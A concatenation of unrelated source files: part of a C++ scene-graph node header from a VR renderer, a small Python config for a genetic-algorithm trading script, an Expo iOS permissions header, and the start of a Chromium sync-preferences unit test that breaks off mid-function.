portal. Stops the search when we reach the hit of the scene graph or hit another portal. */ void getSortKeysForVisibleNodes(std::vector<VROSortKey> *outKeys); /* Render the given element of this node's geometry, using its latest computed transforms. */ void render(int elementIndex, std::shared_ptr<VROMaterial> &material, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Recursively render this node and all of its children, with full texture and lighting. Note: this method does not intelligently batch or sort. It is is less efficient than directly calling render(..) above after proper sorting. */ void render(const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* Recursively render this the silhouette of this node and all of its children. Lighting is fixed at constant, and the given material is used for all elements. If mode is set to Textured, then textures will be bound. This method is typically used to render to the stencil or depth buffers only. The filter is used to only render the silhouettes of specific objects. Returns true on each node to render, false to not. Either way we continue down the tree recursively. */ void renderSilhouettes(std::shared_ptr<VROMaterial> &material, VROSilhouetteMode mode, std::function<bool(const VRONode&)> filter, const VRORenderContext &context, std::shared_ptr<VRODriver> &driver); /* This function recomputes this node's transform before recomputing its umbrella bounding box using its parent's last computed transform. */ void recomputeUmbrellaBoundingBox(); #pragma mark - Geometry void setGeometry(std::shared_ptr<VROGeometry> geometry) { passert_thread(__func__); _geometry = geometry; } std::shared_ptr<VROGeometry> getGeometry() const { return _geometry; } void setIKRig(std::shared_ptr<VROIKRig> rig) { _IKRig = rig; } std::shared_ptr<VROIKRig> getIKRig() { return _IKRig; } /* Called during a render pass to perform a full IK calculation on the rig attached to this node. */ void computeIKRig(); #pragma mark - Camera void setCamera(std::shared_ptr<VRONodeCamera> camera) { passert_thread(__func__); _camera = camera; } const std::shared_ptr<VRONodeCamera> &getCamera() const { return _camera; } #pragma mark - Transforms VROVector3f getWorldPosition() const; VROMatrix4f getWorldRotation() const; VROMatrix4f getWorldTransform() const; VROVector3f getPosition() const { return _position; } VROVector3f getScale() const { return _scale; } VROQuaternion getRotation() const { return _rotation; } VROVector3f getRotationEuler() const { return _euler; } /* The following are atomic, updated once per frame on the rendering thread. They can be accessed safely from any thread to get an up-to-date state of the transform. */ VROMatrix4f getLastWorldTransform() const; VROVector3f getLastWorldPosition() const; VROMatrix4f getLastWorldRotation() const; VROVector3f getLastLocalPosition() const; VROVector3f getLastLocalScale() const; VROQuaternion getLastLocalRotation() const; VROMatrix4f getLastScalePivot() const; VROMatrix4f getLastRotationPivot() const; VROBoundingBox getLastWorldUmbrellaBoundingBox() const; VROBoundingBox getLastLocalUmbrellaBoundingBox() const; VROBoundingBox getLastLocalBoundingBox() const; /* The atomic geometry bounding box is set on the application thread as soon as a geometry is set for this Node. */ void setLastGeometryBoundingBox(VROBoundingBox bounds); /* Set the rotation, position, or scale. Animatable. */ void setRotation(VROQuaternion rotation); void setPosition(VROVector3f position); void setScale(VROVector3f scale); void setTransformDelegate(std::shared_ptr<VROTransformDelegate> delegate); /* Set the rotation as a vector of Euler angles. Using this method will update the Euler angles stored internally in a predictable way. Setting rotation by quaternion updates Euler angles in an unpredictable way (i.e. the quaternion axis may change). */ void setRotationEuler(VROVector3f euler); /* These piecewise setters are used in order to change one axis only, without altering the remaining axes. Useful when animating across multiple axes across separate calls. Animatable. */ void setPositionX(float x); void setPositionY(float y); void setPositionZ(float z); void setScaleX(float x); void setScaleY(float y); void setScaleZ(float z); void setRotationEulerX(float radians); void setRotationEulerY(float radians); void setRotationEulerZ(float radians); /* Pivot points define the center for rotation and scale. For example, by translating the rotation pivot, you can use rotation to rotate an object about a faraway point. By translating the scale pivot, you can scale an object relative to its corner, instead of its center. Not animatable. */ void setRotationPivot(VROMatrix4f pivot); void setScalePivot(VROMatrix4f pivot); /* Get the bounding box and the umbrella bounding box. The former is the bounding box of just this node and its geometry; the latter is the union of this node's bounding box and that of all of its child nodes, descending recurisvely down the scene graph. */ VROBoundingBox getBoundingBox() const; VROBoundingBox getUmbrellaBoundingBox() const; #pragma mark - Application Thread Properties // Viro platforms (e.g. ViroCore) in general set properties on the main thread and dispatch those setters // to the rendering thread. This maintains thread-safety (and speed) because we don't // interfere with the ongoing render cycle when setting variables. However, it's common that // the user wants to set something on the application thread and then immediately invoke some // computation utilizing said variable, before it's been synchronized with the rendering // thread. For this reason we copy all relevant fields from VRONode into std::atomic variables. // These variables can be accessed from any thread. This way, we: // // 1. Maintain speed on the rendering thread (e.g. we don't have to lock or deal with atomics) // 2. Maintain access of this data across threads // // In other words, these atomic fields are *duplicates* of rendering thread fields, but are // accessible from the application thread. They are set in two ways: // // 1. By the application, via any atomic setter, from the application thread. // 2. By the renderer, via automatic sync with the rendering thread counterparts, // once per frame. This mode of update is required because the renderer itself // changes these variables through internal processes like physics and animation. // The atomic setters below will immediately update all of a node's related application // thread properties. For example, node->setPositionAtomic() will immediately update the // application thread's world transform, so that it can be used for other calculations on // the application thread. These setters will *dispatch* to the rendering thread to set the // corresponding rendering thread properties. void setPositionAtomic(VROVector3f position); void setRotationAtomic(VROQuaternion rotation); void setScaleAtomic(VROVector3f scale); void setScalePivotAtomic(VROMatrix4f scalePivot); void setRotationPivotAtomic(VROMatrix4f rotationPivot); /* Must be invoked for this node and its children (all the way down the scene graph) whenever atomic position, scale, scale pivot, rotation, or rotation pivot are set. Computes _lastWorldTransform, _lastWorldPosition, _lastWorldRotation, and _lastWorldBoundingBox, on this node only. Requires the latest data from this node's parent to make the computations. This does not recurse down the scene graph on its own because we do not have access to an application thread copy of the scene graph. ViroCore does have such a copy in Java-land, so it handles the recursive invocation of this method. */ void computeTransformsAtomic(VROMatrix4f parentTransform, VROMatrix4f parentRotation); /* Helper functions used to update the _lastWorldUmbrellaBoundingBox of the given node with the world bounds of _this_ node; that is, the bounds of this node will be union-ed with the bounds of the given node. Return the transform needed for the next recursion. */ void startComputeAtomicUmbrellaBounds(); VROMatrix4f computeAtomicUmbrellaBounds(std::shared_ptr<VRONode> parentNodeBeingUpdated, VROMatrix4f transform); void endComputeAtomicUmbrellaBounds(); /* Recursively sync the application thread properties with the latest values from the rendering thread. Called on the rendering thread after the transform computation occurs in the render cycle. Dispatches to the application thread. */ void syncAppThreadProperties(); #pragma mark - Render Settings std::string getName() const { return _name; } void setName(std::string name) { _name = name; } float getOpacity() const { return _opacity; } void setOpacity(float opacity); virtual bool isHidden() const { return _hidden; } virtual void setHidden(bool hidden); int getRenderingOrder() const { return _renderingOrder; } void setRenderingOrder(int renderingOrder) { _renderingOrder = renderingOrder; } bool isHierarchicalRendering() const { return _hierarchicalRendering; } void setHierarchicalRendering(bool hierarchicalRendering) { _hierarchicalRendering = hierarchicalRendering; } /* True to stop rendering of this node and all of its children until the model load callbacks are finished. Used internally. */ void setHoldRendering(bool hold) { _holdRendering = hold; } /* Returns true if this node was found visible during the last call to computeVisibility(). If a node is not visible, that means none of its children are visible either (we use the umbrella bounding box for visibility tests). */ bool isVisible() const { return _visible; } /* Debug function to count the number of visible nodes (including this node if visible, then recursively descending from this node's children) since the last call to computeVisibility(). */ int countVisibleNodes() const; #pragma mark - Particle Emitters void setParticleEmitter(std::shared_ptr<VROParticleEmitter> emitter); void removeParticleEmitter(); std::shared_ptr<VROParticleEmitter> getParticleEmitter() const; #pragma mark - Lights void addLight(std::shared_ptr<VROLight> light) { passert_thread(__func__); _lights.push_back(light); } void removeLight(std::shared_ptr<VROLight> light) { passert_thread(__func__); _lights.erase( std::remove_if(_lights.begin(), _lights.end(), [light](std::shared_ptr<VROLight> candidate) { return candidate == light; }), _lights.end()); } void removeAllLights() { passert_thread(__func__); _lights.clear(); } std::vector<std::shared_ptr<VROLight>> &getLights() { return _lights; } const std::vector<std::shared_ptr<VROLight>> &getComputedLights() const { return _computedLights; } uint32_t getComputedLightsHash() const { return _computedLightsHash; } void setLightReceivingBitMask(int bitMask, bool recursive = false) { _lightReceivingBitMask = bitMask; if (recursive) { for (std::shared_ptr<VRONode> &child : _subnodes) { child->setLightReceivingBitMask(bitMask, recursive); } } } int getLightReceivingBitMask() const { return _lightReceivingBitMask; } void setShadowCastingBitMask(int bitMask, bool recursive = false) { _shadowCastingBitMask = bitMask; if (recursive) { for (std::shared_ptr<VRONode> &child : _subnodes) { child->setShadowCastingBitMask(bitMask, recursive); } } } int getShadowCastingBitMask() const { return _shadowCastingBitMask; } #pragma mark - Sounds void addSound(std::shared_ptr<VROSound> sound) { passert_thread(__func__); if (sound->getType() == VROSoundType::Spatial) { _sounds.push_back(sound); } } void removeSound(std::shared_ptr<VROSound> sound) { passert_thread(__func__); _sounds.erase( std::remove_if(_sounds.begin(), _sounds.end(), [sound](std::shared_ptr<VROSound> candidate) { return candidate == sound; }), _sounds.end()); } void removeAllSounds() { passert_thread(__func__); _sounds.clear(); } #pragma mark - Scene Graph void addChildNode(std::shared_ptr<VRONode> node); void removeFromParentNode(); /* Return a copy of the subnode list. */ std::vector<std::shared_ptr<VRONode>> getChildNodes() const; /* Remove all children from this node. */ void removeAllChildren(); /* Return the parent node. Null if this node is root or does not have a parent. */ std::shared_ptr<VRONode> getParentNode() const { return _supernode.lock(); } /* Get the parent scene of this VRONode. If this node is not attached to the scene graph, this will return null. */ std::shared_ptr<VROScene> getScene() const { return _scene.lock(); } /* Returns a vec of skinners associated with this node. If recurse is true, we also examine recursively down the subtree and return any found skinners as well. */ void getSkinner(std::vector<std::shared_ptr<VROSkinner>> &skinnerOut, bool recurse); /* Set the parent scene of this node. Internal use only. */ void setScene(std::shared_ptr<VROScene> scene, bool recursive); /* Returns the type of this node. Faster then dynamic_cast. */ VRONodeType getType() const { return _type; } /* Get the nearest portal that's an ancestor of this node. Returns null if this is the root node. */ const std::shared_ptr<VROPortal> getParentPortal() const; /* Get the nearest child portals of this node. This recurses down the graph in all directions, stopping whenever we hit a portal or the end of the graph. */ void getChildPortals(std::vector<std::shared_ptr<VROPortal>> *outPortals) const; #pragma mark - Actions and Animations /* Actions enable open-ended and fully customizable manipulation of nodes over successive frames. */ void runAction(std::shared_ptr<VROAction> action); void removeAction(std::shared_ptr<VROAction> action); void removeAllActions(); /* Animations enable structured manipulation of nodes over successive frames. They can be as simple interpolating batches of properties over time, or as complex as full skeletal animation. These methods take a key parameter. Keys identify animations that run together in a single transaction; e.g., there can be multiple animations with a single key. removeAnimation will remove *all* animations with the given key. */ void addAnimation(std::string key, std::shared_ptr<VROExecutableAnimation> animation); void removeAnimation(std::string key); /* Get the keys for all animations in this node. If recursive is true, will search down the hierarchy as well. */ std::set<std::string> getAnimationKeys(bool recursive); /* Retrieve all animations with the given key, as a single, composite executable animation. If recursive is true, then this will return a new parallel VROAnimationChain that contains every animation in this node and every animation in any subnode that shares the same key. For example, if the animation 'Take 001' contains a torso animation and an arm animation, both will be returned in a single animation group. */ std::shared_ptr<VROExecutableAnimation> getAnimation(std::string key, bool recursive); /* Retrieve all the animations with the given keys as a single, composite executable animation. If multiple animations influence the same bone, the provided weights determine how the animations blend. If recursive is true, this will search subnodes for animations as well. For example, if the animation 'Body' and the animation 'LeftArm' contain torso and left arm animations, both will be returned in a single animation group. If both animations move the left arm, their influences on the left arm will be blended. */ std::shared_ptr<VROExecutableAnimation> getLayeredAnimation(std::vector<std::shared_ptr<VROSkeletalAnimationLayer>> layers, bool recursive); /* Remove all animations from this node. */ void removeAllAnimations(); /* Triggered when the animation running this animatable node completes. */ void onAnimationFinished(); /* Returns a set of VROMorphers containing all morph targets that are associated with this node. If recursive is true, we will search down the node hierarchy as well. */ std::set<std::shared_ptr<VROMorpher>> getMorphers(bool recursive); #pragma mark - Events std::vector<VROHitTestResult> hitTest(const VROCamera &camera, VROVector3f origin, VROVector3f ray, bool boundsOnly = false); void setSelectable(bool selectable) { _selectable = selectable; } void setEventDelegate(std::shared_ptr<VROEventDelegate> delegate) { passert_thread(__func__); _eventDelegateWeak = delegate; } std::shared_ptr<VROEventDelegate> getEventDelegate() { if (_eventDelegateWeak.expired()){ return nullptr; } return _eventDelegateWeak.lock(); } bool isSelectable() const { return _selectable; } void setIgnoreEventHandling(bool canHandle) { _ignoreEventHandling = canHandle; for (std::shared_ptr<VRONode> childNode : getChildNodes()){ childNode->setIgnoreEventHandling(canHandle); } } bool getIgnoreEventHandling() const { return _ignoreEventHandling; } void setTag(std::string tag) { _tag = tag; } std::string getTag() const { return _tag; } void setHighAccuracyEvents(bool enabled); bool getHighAccuracyEvents() const { return _highAccuracyEvents; } void setIsBeingDragged(bool isDragging) { std::shared_ptr<VROPhysicsBody> physicsBody = getPhysicsBody(); if (physicsBody != nullptr) { physicsBody->setKinematicDrag(isDragging); } } void setDragType(VRODragType dragType) { _dragType = dragType; } VRODragType getDragType() { return _dragType; } void setDragPlanePoint(VROVector3f point) { _dragPlanePoint = point; } VROVector3f getDragPlanePoint() { return _dragPlanePoint; } void setDragPlaneNormal(VROVector3f normal) { _dragPlaneNormal = normal; } VROVector3f getDragPlaneNormal() { return _dragPlaneNormal; } void setDragMaxDistance(float maxDistance) { _dragMaxDistance = maxDistance; } float getDragMaxDistance() { return _dragMaxDistance; } bool isAnimatingDrag() { return _isAnimatingDrag; } void setIsAnimatingDrag(bool isAnimatingDrag) { _isAnimatingDrag = isAnimatingDrag; } std::shared_ptr<VROTransaction> getDragAnimation() { return _dragAnimation; } void setDragAnimation(std::shared_ptr<VROTransaction> dragAnimation) { _dragAnimation = dragAnimation; } #pragma mark - Constraints void addConstraint(std::shared_ptr<VROConstraint> constraint); void removeConstraint(std::shared_ptr<VROConstraint> constraint); void removeAllConstraints(); #pragma mark - Physics std::shared_ptr<VROPhysicsBody> initPhysicsBody(VROPhysicsBody::VROPhysicsBodyType type, float mass, std::shared_ptr<VROPhysicsShape> shape); std::shared_ptr<VROPhysicsBody> getPhysicsBody() const; void clearPhysicsBody(); #pragma mark - Task Queues void addTaskQueue(std::shared_ptr<VROTaskQueue> queue); void removeTaskQueue(std::shared_ptr<VROTaskQueue> queue); protected: VRONodeType _type; /* The node's parent and children. */ std::vector<std::shared_ptr<VRONode>> _subnodes; std::weak_ptr<VRONode> _supernode; /* The VROScene to which this node belongs. */ std::weak_ptr<VROScene> _scene; /* The geometry in the node. Null means the node has no geometry. */ std::shared_ptr<VROGeometry> _geometry; /* The inverse kinematic rig associated with this node, set when this node is considered the root node joint of the rig. */ std::shared_ptr<VROIKRig> _IKRig; /* True if this node was found visible during the last call to computeVisibility(). */ bool _visible; /* Last frame that this node was visited during sorting. Used for graph traversal. */ int _lastVisitedRenderingFrame; private: /* Name for debugging. */ std::string _name; /* Unique identifier. */ int _uniqueID; /* Lights, sound, particles, and camera. */ std::vector<std::shared_ptr<VROLight>> _lights; std::vector<std::shared_ptr<VROSound>> _sounds; std::shared_ptr<VROParticleEmitter> _particleEmitter; std::shared_ptr<VRONodeCamera> _camera; /* Scale and position. */ VROVector3f _scale; VROVector3f _position; /* Rotation is stored as a quaternion, but we also maintain euler angles for use in animation (since we cannot additively rotate by reading euler angles from a quaternion and writing them again). */ VROQuaternion _rotation; VROVector3f _euler; /* Pivots define the center of the rotation and scale operations. Declared optional becuase they are not always used, and we can optimize them away when not used. */ std::experimental::optional<VROMatrix4f> _rotationPivot; std::experimental::optional<VROMatrix4f> _rotationPivotInverse; std::experimental::optional<VROMatrix4f> _scalePivot; std::experimental::optional<VROMatrix4f> _scalePivotInverse; /* User-defined rendering order for this node. */ int _renderingOrder; /* Parameters computed by descending down the tree. These are updated whenever any parent or this node itself is updated. For example, computedOpacity is the opacity of this node multiplied by the opacities of all this node's ancestors. Similarly, worldTransform is the full cascaded transformation matrix for the node. worldRotation only takes into account rotations (not scale or translation). computedLights are the lights that influence this node, based on distance from the light and light attenuation, unrelated to the scene graph (e.g. the lights in _computedLights may belong to any node in the scene). localTransform only takes into the account the transformations of _this_ node. */ VROMatrix4f _localTransform; VROMatrix4f _worldTransform; VROMatrix4f _worldInverseTransposeTransform; VROMatrix4f _worldRotation; VROVector3f _worldPosition; float _computedOpacity; std::vector<std::shared_ptr<VROLight>> _computedLights; uint32_t _computedLightsHash; std::weak_ptr<VROTransformDelegate> _transformDelegate; /* Application-thread copies of the node's transform data. See the 'Application Thread Properties' pragma above for a more extensive description of why we need these fields. The following are computed fields (not directly set by users). */ VROAtomic<VROMatrix4f> _lastLocalTransform; VROAtomic<VROMatrix4f> _lastWorldTransform; VROAtomic<VROVector3f> _lastWorldPosition; VROAtomic<VROMatrix4f> _lastWorldRotation; /* Bounding boxes are either defined in world or local coordinates, and encapsulate either _this_ node only, or this node and all children (umbrella). */ VROAtomic<VROBoundingBox> _lastWorldBoundingBox; VROAtomic<VROBoundingBox> _lastLocalBoundingBox; VROAtomic<VROBoundingBox> _lastGeometryBoundingBox; VROAtomic<VROBoundingBox> _lastLocalUmbrellaBoundingBox; VROAtomic<VROBoundingBox> _lastWorldUmbrellaBoundingBox; bool _lastUmbrellaBoundsSet; /* Directly-set application thread properties. */ VROAtomic<VROVector3f> _lastPosition; VROAtomic<VROVector3f> _lastScale; VROAtomic<VROQuaternion> _lastRotation; VROAtomic<VROMatrix4f> _lastScalePivot, _lastScalePivotInverse; VROAtomic<VROMatrix4f> _lastRotationPivot, _lastRotationPivotInverse; VROAtomic<bool> _lastHasScalePivot; VROAtomic<bool> _lastHasRotationPivot; /* The bounding box containing this node's geometry, in both local and world coordinates. The umbrella variant encompasses not only this geometry, but the geometries of all this node's children. The geometry bounding box is the bounding box for the geometry without any transforms applied, while the local bounding box is the bounding box with local transforms applied. */ VROBoundingBox _geometryBoundingBox; // No transforms VROBoundingBox _localBoundingBox; // Local transforms VROBoundingBox _worldBoundingBox; // World transforms VROBoundingBox _localUmbrellaBoundingBox; VROBoundingBox _worldUmbrellaBoundingBox; VROFrustumBoxIntersectionMetadata _umbrellaBoxMetadata; /* True if this node is hidden. Hidden nodes are not rendered, and do not respond to tap events. Hiding a node within an animation results in a fade-out animation. The _opacityFromHiddenFlag is the opacity as derived from _hidden: 0.0 if _hidden is true, 1.0 if _hidden is false, or somewhere in-between during animation. */ bool _hidden; float _opacityFromHiddenFlag; /* The opacity of the node (0.0 is transparent, 1.0 is opaque). When opacity drops below a threshold value, the node is hidden. This opacity is set by the user. */ float _opacity; /* True if this node is selectable by hit testing. Defaults to true. */ bool _selectable; /* True if this node is set to ignore all events fired from VROBaseInputController. */ bool _ignoreEventHandling; /* Delegate through which events are notified from the VROEventManager. */ std::weak_ptr<VROEventDelegate> _eventDelegateWeak; /* True if we want to perform more accurate event hit testing against this node's geometry rather than its bounding box. */ bool _highAccuracyEvents; /* Active actions on this node. */ std::vector<std::shared_ptr<VROAction>> _actions; /* Animations stored with this node. */ std::map<std::string, std::vector<std::shared_ptr<VROExecutableAnimation>>> _animations; /* Constraints on the node, which can modify the node's transformation matrix. */ std::vector<std::shared_ptr<VROConstraint>> _constraints; /* True indicates that this node's descendants (children, grand-children, and so on) should be rendered by order of their scene graph depth, with depth reading disabled. Useful when rendering 2D layouts like flexbox views, where the parent components and their children have depths so close together that reverting to the painter's algorithm instead of depth testing produces better results (minimal z-fighting). Defaults to false. */ bool _hierarchicalRendering; /* The drag type to use for this VRONode. */ VRODragType _dragType; /* The point in 3D space on the plane to "drag" */ VROVector3f _dragPlanePoint; /* The normal of the plane to "drag" along */ VROVector3f _dragPlaneNormal; /* The max distance from the controller the user is allowed to drag an item (threshold behavior depends on the _dragType selected). */ float _dragMaxDistance; /* Whether or not a drag is still being animated (used only if _dragType == VRODragType::FixedToWorld */ bool _isAnimatingDrag; /* The VROTransaction representing the animation from dragging while _dragType == VRODragType::FixedToWorld. */ std::shared_ptr<VROTransaction> _dragAnimation; #pragma mark - Private /* Notifies attached transform delegate, if any, that a position change had occurred. */ void notifyTransformUpdate(bool forced); /* Recursively set the visibility of this node and all of its children to the given value. */ void setVisibilityRecursive(bool visible); /* Recursively expand the given bounding box by this node's _worldBoundingBox. */ void computeUmbrellaBounds(); bool computeUmbrellaBounds(VROBoundingBox *localBounds, VROBoundingBox *worldBounds, VROMatrix4f transform, bool isSet) const; /* Compute the transform for this node, taking into the account the parent's transform. Updates all related variables: _worldTransform _worldPosition _worldBoundingBox */ void doComputeTransform(VROMatrix4f parentTransform); /* Action processing: execute all current actions and remove those that are expired. */ void processActions(); /* Get the animations in this node under the given key, and add them to the given vector. */ void getAnimations(std::vector<std::shared_ptr<VROExecutableAnimation>> &animations, std::string key, bool recursive); /* Get the keys of all animations in this node, and add them to the given set. */ void getAnimationKeys(std::set<std::string> &animations, bool recursive); /* Hit test helper functions. */ void hitTest(const VROCamera &camera, VROVector3f origin, VROVector3f ray, bool boundsOnly, std::vector<VROHitTestResult> &results); bool hitTestGeometry(VROVector3f origin, VROVector3f ray, VROMatrix4f transform, VROVector3f *intPt); /* The light and shadow bit masks. These are logically ANDed with each light's influence bit mask. If the result is non-zero for the light bit mask, then the light will illuminate the node. If the result is zero, then this node will be excluded from the light's illumination, including receipt of that light's shadows. If the AND result is non-zero for the shadow casting bit map, then the node will be cast shadows from the light (e.g. it will be rendered to that light's shadow map). If the result is zero, it will not cast shadows from said light. These both default to 1. */ int _lightReceivingBitMask; int _shadowCastingBitMask; /* Physics rigid body that if defined, drives and sets the transformations of this node. */ std::shared_ptr<VROPhysicsBody> _physicsBody; /* Non-unique tag identifier representing this node. Defaults to kDefaultNodeTag. */ std::string _tag = kDefaultNodeTag; /* Used internally to hold the rendering of a node and all of its children until a model load callback has been invoked. */ bool _holdRendering; /* Task queus used for loading objects into this VRONode. We store these here in order to scope them to the lifetime of the node for which they are performing loading tasks. */ std::vector<std::shared_ptr<VROTaskQueue>> _taskQueues; }; #endif /* VRONode_h */
14,733
5,871
<filename>scripts/genetic_algo/conf.py<gh_stars>1000+ import random selectors = { 'BTC-CUR': ['gdax.BTC-USD', 'gdax.BTC-EUR', 'gdax.BTC-GBP'], 'ETH-BTC': ['gdax.ETH-BTC'], 'ETH-EUR': ['gdax.ETH-EUR'], 'ETH-USD': ['gdax.ETH-USD'], 'ETH-CUR': ['gdax.ETH-USD', 'gdax.ETH-EUR'], } partitions = 2 selectivity = 0.3 runid = random.randint(1000, 9999) sigma = 20 indpb = 0.3 mutpb = 0.3 cxpb = 0.3
208
1,338
#include <../os/package/hpkg/PackageData.h>
17
16,461
<filename>ios/Exponent/Kernel/Services/EXPermissionsManager.h // Copyright 2019-present 650 Industries. All rights reserved. #import <ExpoModulesCore/EXSingletonModule.h> #import "EXScopedPermissions.h" NS_ASSUME_NONNULL_BEGIN @interface EXPermissionsManager : EXSingletonModule <EXPermissionsScopedModuleDelegate> @end NS_ASSUME_NONNULL_END
115
777
<reponame>google-ar/chromium<gh_stars>100-1000 // Copyright 2014 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/sync_preferences/pref_service_syncable.h" #include <stdint.h> #include <memory> #include "base/json/json_reader.h" #include "base/json/json_string_value_serializer.h" #include "base/json/json_writer.h" #include "base/macros.h" #include "base/memory/ptr_util.h" #include "base/message_loop/message_loop.h" #include "base/strings/utf_string_conversions.h" #include "components/pref_registry/pref_registry_syncable.h" #include "components/prefs/scoped_user_pref_update.h" #include "components/sync/model/attachments/attachment_id.h" #include "components/sync/model/attachments/attachment_service_proxy_for_test.h" #include "components/sync/model/sync_change.h" #include "components/sync/model/sync_data.h" #include "components/sync/model/sync_error_factory_mock.h" #include "components/sync/model/syncable_service.h" #include "components/sync/protocol/preference_specifics.pb.h" #include "components/sync/protocol/sync.pb.h" #include "components/sync_preferences/pref_model_associator.h" #include "components/sync_preferences/pref_model_associator_client.h" #include "components/sync_preferences/testing_pref_service_syncable.h" #include "testing/gtest/include/gtest/gtest.h" using syncer::SyncChange; using syncer::SyncData; namespace sync_preferences { namespace { const char kExampleUrl0[] = "http://example.com/0"; const char kExampleUrl1[] = "http://example.com/1"; const char kExampleUrl2[] = "http://example.com/2"; const char kStringPrefName[] = "string_pref_name"; const char kListPrefName[] = "list_pref_name"; const char kUnsyncedPreferenceName[] = "nonsense_pref_name"; const char kUnsyncedPreferenceDefaultValue[] = "default"; const char kDefaultCharsetPrefName[] = "default_charset"; const char kNonDefaultCharsetValue[] = "foo"; const char kDefaultCharsetValue[] = "utf-8"; void Increment(int* num) { (*num)++; } class TestPrefModelAssociatorClient : public PrefModelAssociatorClient { public: TestPrefModelAssociatorClient() {} ~TestPrefModelAssociatorClient() override {} // PrefModelAssociatorClient implementation. bool IsMergeableListPreference(const std::string& pref_name) const override { return pref_name == kListPrefName; } bool IsMergeableDictionaryPreference( const std::string& pref_name) const override { return false; } private: DISALLOW_COPY_AND_ASSIGN(TestPrefModelAssociatorClient); }; class TestSyncProcessorStub : public syncer::SyncChangeProcessor { public: explicit TestSyncProcessorStub(syncer::SyncChangeList* output) : output_(output), fail_next_(false) {} syncer::SyncError ProcessSyncChanges( const tracked_objects::Location& from_here, const syncer::SyncChangeList& change_list) override { if (output_) output_->insert(output_->end(), change_list.begin(), change_list.end()); if (fail_next_) { fail_next_ = false; return syncer::SyncError(FROM_HERE, syncer::SyncError::DATATYPE_ERROR, "Error", syncer::PREFERENCES); } return syncer::SyncError(); } void FailNextProcessSyncChanges() { fail_next_ = true; } syncer::SyncDataList GetAllSyncData(syncer::ModelType type) const override { return syncer::SyncDataList(); } private: syncer::SyncChangeList* output_; bool fail_next_; }; class PrefServiceSyncableTest : public testing::Test { public: PrefServiceSyncableTest() : pref_sync_service_(NULL), test_processor_(NULL), next_pref_remote_sync_node_id_(0) {} void SetUp() override { prefs_.SetPrefModelAssociatorClientForTesting(&client_); prefs_.registry()->RegisterStringPref(kUnsyncedPreferenceName, kUnsyncedPreferenceDefaultValue); prefs_.registry()->RegisterStringPref( kStringPrefName, std::string(), user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); prefs_.registry()->RegisterListPref( kListPrefName, user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); prefs_.registry()->RegisterStringPref( kDefaultCharsetPrefName, kDefaultCharsetValue, user_prefs::PrefRegistrySyncable::SYNCABLE_PREF); pref_sync_service_ = reinterpret_cast<PrefModelAssociator*>( prefs_.GetSyncableService(syncer::PREFERENCES)); ASSERT_TRUE(pref_sync_service_); } syncer::SyncChange MakeRemoteChange(int64_t id, const std::string& name, const base::Value& value, SyncChange::SyncChangeType type) { std::string serialized; JSONStringValueSerializer json(&serialized); if (!json.Serialize(value)) return syncer::SyncChange(); sync_pb::EntitySpecifics entity; sync_pb::PreferenceSpecifics* pref_one = entity.mutable_preference(); pref_one->set_name(name); pref_one->set_value(serialized); return syncer::SyncChange( FROM_HERE, type, syncer::SyncData::CreateRemoteData( id, entity, base::Time(), syncer::AttachmentIdList(), syncer::AttachmentServiceProxyForTest::Create())); } void AddToRemoteDataList(const std::string& name, const base::Value& value, syncer::SyncDataList* out) { std::string serialized; JSONStringValueSerializer json(&serialized); ASSERT_TRUE(json.Serialize(value)); sync_pb::EntitySpecifics one; sync_pb::PreferenceSpecifics* pref_one = one.mutable_preference(); pref_one->set_name(name); pref_one->set_value(serialized); out->push_back(SyncData::CreateRemoteData( ++next_pref_remote_sync_node_id_, one, base::Time(), syncer::AttachmentIdList(), syncer::AttachmentServiceProxyForTest::Create())); } void InitWithSyncDataTakeOutput(const syncer::SyncDataList& initial_data, syncer::SyncChangeList* output) { test_processor_ = new TestSyncProcessorStub(output); syncer::SyncMergeResult r = pref_sync_service_->MergeDataAndStartSyncing( syncer::PREFERENCES, initial_data, base::WrapUnique(test_processor_), base::MakeUnique<syncer::SyncErrorFactoryMock>()); EXPECT_FALSE(r.error().IsSet()); } void InitWithNoSyncData() { InitWithSyncDataTakeOutput(syncer::SyncDataList(), NULL); } const base::Value& GetPreferenceValue(const std::string& name) { const PrefService::Preference* preference = prefs_.FindPreference(name.c_str()); return *preference->GetValue(); } std::unique_ptr<base::Value> FindValue(const std::string& name, const syncer::SyncChangeList& list) { syncer::SyncChangeList::const_iterator it = list.begin(); for (; it != list.end(); ++it) { if (syncer::SyncDataLocal(it->sync_data()).GetTag() == name) { return base::JSONReader::Read( it->sync_data().GetSpecifics().preference().value()); } } return nullptr; } bool IsSynced(const std::string& pref_name) { return pref_sync_service_->registered_preferences().count(pref_name) > 0; } bool HasSyncData(const std::string& pref_name) { return pref_sync_service_->IsPrefSynced(pref_name); } PrefService* GetPrefs() { return &prefs_; } TestingPrefServiceSyncable* GetTestingPrefService() { return &prefs_; } protected: TestPrefModelAssociatorClient client_; TestingPrefServiceSyncable prefs_; PrefModelAssociator* pref_sync_service_; TestSyncProcessorStub* test_processor_; // TODO(tim): Remove this by fixing AttachmentServiceProxyForTest. base::MessageLoop loop_; int next_pref_remote_sync_node_id_; }; TEST_F(PrefServiceSyncableTest, CreatePrefSyncData) { prefs_.SetString(kStringPrefName, kExampleUrl0); const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); syncer::SyncData sync_data; EXPECT_TRUE(pref_sync_service_->CreatePrefSyncData( pref->name(), *pref->GetValue(), &sync_data)); EXPECT_EQ(std::string(kStringPrefName), syncer::SyncDataLocal(sync_data).GetTag()); const sync_pb::PreferenceSpecifics& specifics( sync_data.GetSpecifics().preference()); EXPECT_EQ(std::string(kStringPrefName), specifics.name()); std::unique_ptr<base::Value> value = base::JSONReader::Read(specifics.value()); EXPECT_TRUE(pref->GetValue()->Equals(value.get())); } TEST_F(PrefServiceSyncableTest, ModelAssociationDoNotSyncDefaults) { const PrefService::Preference* pref = prefs_.FindPreference(kStringPrefName); EXPECT_TRUE(pref->IsDefaultValue()); syncer::SyncChangeList out; InitWithSyncDataTakeOutput(syncer::SyncDataList(), &out); EXPECT_TRUE(IsSynced(kStringPrefName)); EXPECT_TRUE(pref->IsDefaultValue()); EXPECT_FALSE(FindValue(kStringPrefName, out).get()); } TEST_F(PrefServiceSyncableTest, ModelAssociationEmptyCloud) { prefs_.SetString(kStringPrefName, kExampleUrl0); { ListPrefUpdate update(GetPrefs(), 